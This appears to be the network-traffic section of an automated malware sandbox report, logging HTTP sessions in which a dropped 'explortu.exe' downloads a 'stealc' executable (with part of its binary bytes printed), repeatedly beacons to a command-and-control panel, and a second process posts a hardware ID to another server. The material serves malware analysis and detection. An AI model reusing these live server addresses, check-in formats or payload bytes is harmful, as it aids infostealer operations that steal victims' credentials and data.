                                                                3192.168.2.64972977.91.77.81806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:04.085410118 CEST54OUTGET /stealc/random.exe HTTP/1.1
                                                                Host: 77.91.77.81
                                                                Jun 27, 2024 05:59:04.792975903 CEST1236INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:04 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 2515456
                                                                Last-Modified: Thu, 27 Jun 2024 00:29:28 GMT
                                                                Connection: keep-alive
                                                                ETag: "667cb268-266200"
                                                                Accept-Ranges: bytes
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 4c 58 be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 be 00 00 04 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$JdZaaa5ZaaRichPELuf!LX@p@ pWx}p@@@0!@@Pp# @x#(@.data0"@."4@
                                                                Jun 27, 2024 05:59:04.792992115 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 23 d8 2d 55 ae f6 5e 8e 2d 8f fb b4 aa 3c 9d f4 20 28 93 d0 7a 1c 8c b2 d3
                                                                Data Ascii: #-U^-< (zE03MQMOD]X*>6ItSVBXp}:"|ns5I&w2.klMp-j{XBRQN9<jYW:~^HXspR
                                                                Jun 27, 2024 05:59:04.793004036 CEST1236INData Raw: 33 e2 2a bc b8 e1 ca 89 e8 fd a2 64 f2 8a 0a b5 79 bd 4f 4d 95 97 25 d9 7d aa ea 64 0e ef b8 80 bf 25 b0 d1 40 b9 94 29 58 63 5f b1 f0 3a 33 27 eb c4 b6 b3 93 81 56 93 ac 28 af 4a a1 d6 cc d6 44 35 00 aa 65 d4 1a 7b 13 78 47 52 bd 52 12 1b 6b 46
                                                                Data Ascii: 3*dyOM%}d%@)Xc_:3'V(JD5e{xGRRkF6;I%eo48_n{Lg1qhpYYH}QRcsqyKA^vJ!N'8`^$juGBvJ
                                                                Jun 27, 2024 05:59:04.793020010 CEST672INData Raw: e0 43 d1 08 f0 38 11 30 01 8b 16 bf fe af 1f 92 62 69 d5 b0 ae dc 4a 59 00 c5 1f 87 1e 6c ce 51 72 a1 c1 df f5 5b 60 b7 f1 e7 92 0a 95 51 55 91 95 29 8e 85 41 ec 45 00 da bf 2f 8e d5 30 4d 36 8e bb e7 69 38 9d b2 9a c0 be 7e 11 e0 99 b1 5d 8c d6
                                                                Data Ascii: C80biJYlQr[`QU)AE/0M6i8~]41[4f#OY& Spt?Jgeh/\J-;C(Q%@M%%q.:wk4yOt6CE~}J^v R*']'?hs)UiU
                                                                Jun 27, 2024 05:59:04.793030024 CEST1236INData Raw: 2c 5e 9a eb 1c 1f cd a5 9b 64 3c e8 2a 15 bd 3b 64 7c ca 4b a1 c4 8e 02 b0 0b f9 bc f1 90 78 34 c1 70 11 8e 0b 43 9d a2 b7 3a bc 3c 2b 84 31 dc 52 21 3d 6c c7 56 c2 86 4e 76 45 8e 2b 98 eb 2c ed 45 06 41 cb 60 fd 75 b6 f6 09 f4 17 d9 73 bd b5 d2
                                                                Data Ascii: ,^d<*;d|Kx4pC:<+1R!=lVNvE+,EA`us+);rP_UY6IGsW0>l|i}WJ`X<Zx*xumZhr8{=/-/6 9f]&tkywr
                                                                Jun 27, 2024 05:59:04.793104887 CEST1236INData Raw: 83 3a fa 25 a8 5e c5 6d 8d e9 63 94 8e 62 84 fd f3 4b 79 18 41 79 cb 94 b2 79 d0 02 84 9d ec 07 f1 9e d8 e4 b0 eb 5a 11 99 80 90 84 5e 78 b3 bf e0 05 dc 21 0b d6 d8 b2 44 10 8b 1b 72 20 30 e1 73 b5 59 30 2b 68 78 38 e7 8e 6b 47 7f f2 fb 78 9e 01
                                                                Data Ascii: :%^mcbKyAyyZ^x!Dr 0sY0+hx8kGx*L.J6sg/HP|j@ApvupO>#j~GyT-346 0QN{ EtZ2f7%c2.e>n%<c T
                                                                Jun 27, 2024 05:59:04.793116093 CEST1236INData Raw: c3 f9 fd 5c 41 6c 1d 81 5f 22 c3 7d 69 5a e3 48 fd 46 5a 44 2b f7 e8 26 80 d1 89 68 bb d7 9e 21 d7 43 84 2f 51 35 9d 96 82 e8 e5 52 e9 2a 4e 85 f2 ba df 19 4d a0 4b 5f 20 9b 41 7b 1c 04 a0 17 e6 4f 2e fc 07 13 9f 6a a0 42 21 ad 4e d7 8c 66 88 d3
                                                                Data Ascii: \Al_"}iZHFZD+&h!C/Q5R*NMK_ A{O.jB!Nfo;\@bJ(XHI=.}NVK'>rzv5^fKu2Pc,@(RFil%G]"[H*j)a^5VjyG}<T`h~
                                                                Jun 27, 2024 05:59:04.793127060 CEST1236INData Raw: 00 be 42 bb 3e 70 ae a2 28 d0 69 a5 75 72 63 f5 06 7d d9 0d 6d 55 91 01 59 34 51 8d c5 be 98 09 e4 58 f9 b5 6d 9d bc e3 83 c2 06 b4 50 aa dd 1c 24 c7 38 5a 11 e2 76 3e f3 e8 66 e6 30 c4 9f 3b 77 f0 bc 88 fc b4 8c 0a df b5 7c 9c c6 f6 09 69 c1 50
                                                                Data Ascii: B>p(iurc}mUY4QXmP$8Zv>f0;w|iPwl_B}]Ka%`V4>%K[g(+/F9sb?GSpk9!+n|5S@e* q$s$H%y(P>ziZRuMww;2j5O&=N
                                                                Jun 27, 2024 05:59:04.793262959 CEST1236INData Raw: ce 82 4f 6a 0a 68 6d 26 5a a5 cd 13 29 85 44 2a fe f1 9b f6 49 4e 48 c0 29 03 68 eb 6b 03 72 08 d4 17 b2 e9 52 e0 95 cf 8c af a2 fe 45 a8 fb e2 c9 ea e0 42 c8 74 f4 99 be 34 6c 6b a2 19 f0 2a ed be f6 aa d7 37 fc 8a 8f 7e 37 28 7c 45 a5 93 b1 f9
                                                                Data Ascii: Ojhm&Z)D*INH)hkrREBt4lk*7~7(|EG^9SLKVq=X"Q6xLlFu: Lif*b]6fc?-u0u|Ydgv1ST`I=;?&cnfcBj+
                                                                Jun 27, 2024 05:59:04.793273926 CEST1236INData Raw: da 01 cb 6f af 4f 51 89 c3 80 48 1c d6 90 d8 60 87 74 b6 74 61 4d 66 7b 2c 5d 0d 16 a0 89 27 66 13 63 5e c3 61 e1 da ea 03 6a 59 d0 0f 34 21 08 82 f0 58 2c 64 0a 95 13 76 4e f4 eb f1 0d e5 f4 03 d2 c4 9d 40 b3 de 11 7a 81 5f f0 9b 00 08 1b 94 00
                                                                Data Ascii: oOQH`ttaMf{,]'fc^ajY4!X,dvN@z_UY.A,!2M:oUDRH$F|-QXRU:Qq-UmY+;ZSl&8a*0R(*Q1+YN{R!%mFDV4qIi3x^b
                                                                Jun 27, 2024 05:59:04.797903061 CEST1236INData Raw: 76 23 69 40 f9 eb 28 15 89 ee 1a 63 7f ea 09 4c d7 8c 65 09 03 ee 8b 76 c5 b2 71 eb ed 24 1d e8 2c 54 d1 96 a7 64 99 4a aa f9 08 23 da 61 45 06 68 85 dc 11 12 f8 a3 3d fd 57 24 57 05 cf 92 64 66 5d 69 cc 61 1d 0c 90 01 09 0f 3c bf f7 f3 80 2a d7
                                                                Data Ascii: v#i@(cLevq$,TdJ#aEh=W$Wdf]ia<*9?/VJml@"Vnk5uF;PG?){JgmC1s:PXOW2`jqIa]mC"yb08|OWo$ ``f>*


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.649730147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:07.613451004 CEST182OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 31
                                                                Cache-Control: no-cache
                                                                Data Raw: 64 31 3d 31 30 30 30 30 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                Data Ascii: d1=1000022001&unit=246122658369
                                                                Jun 27, 2024 05:59:08.290344000 CEST193INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 4 <c>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.64973185.28.47.4806184C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:07.681565046 CEST409OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----JKKEBGCGHIDHCBFHIDGH
                                                                Host: 85.28.47.4
                                                                Content-Length: 212
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 33 37 35 37 39 31 41 30 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 2d 2d 0d 0a
                                                                Data Ascii: ------JKKEBGCGHIDHCBFHIDGHContent-Disposition: form-data; name="hwid"ED375791A0EA20379026------JKKEBGCGHIDHCBFHIDGHContent-Disposition: form-data; name="build"default------JKKEBGCGHIDHCBFHIDGH--
                                                                Jun 27, 2024 05:59:08.289827108 CEST211INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:59:08 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 8
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 59 6d 78 76 59 32 73 3d
                                                                Data Ascii: YmxvY2s=


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.649733147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:08.410465956 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:09.077193975 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:09.083626986 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:09.290611982 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.649734147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:09.410012960 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:10.085139990 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:10.086199045 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:10.296442986 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.649735147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:10.410067081 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:11.081392050 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:11.082540035 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:11.289351940 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.649736147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:11.409940004 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:12.104649067 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:12.105972052 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:12.318279982 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.649737147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:12.440992117 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:13.126936913 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:13.128149033 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:13.339138031 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.649738147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:13.459079981 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:14.145204067 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:14.146076918 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB72D72B35A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jun 27, 2024 05:59:14.356543064 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.649739147.45.47.155806892C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:59:14.472229958 CEST154OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jun 27, 2024 05:59:15.147504091 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Thu, 27 Jun 2024 03:59:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jun 27, 2024 05:59:15.148448944 CEST312OUTPOST /ku4Nor9/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 147.45.47.155
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 37 32 44 37 32 42 33 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
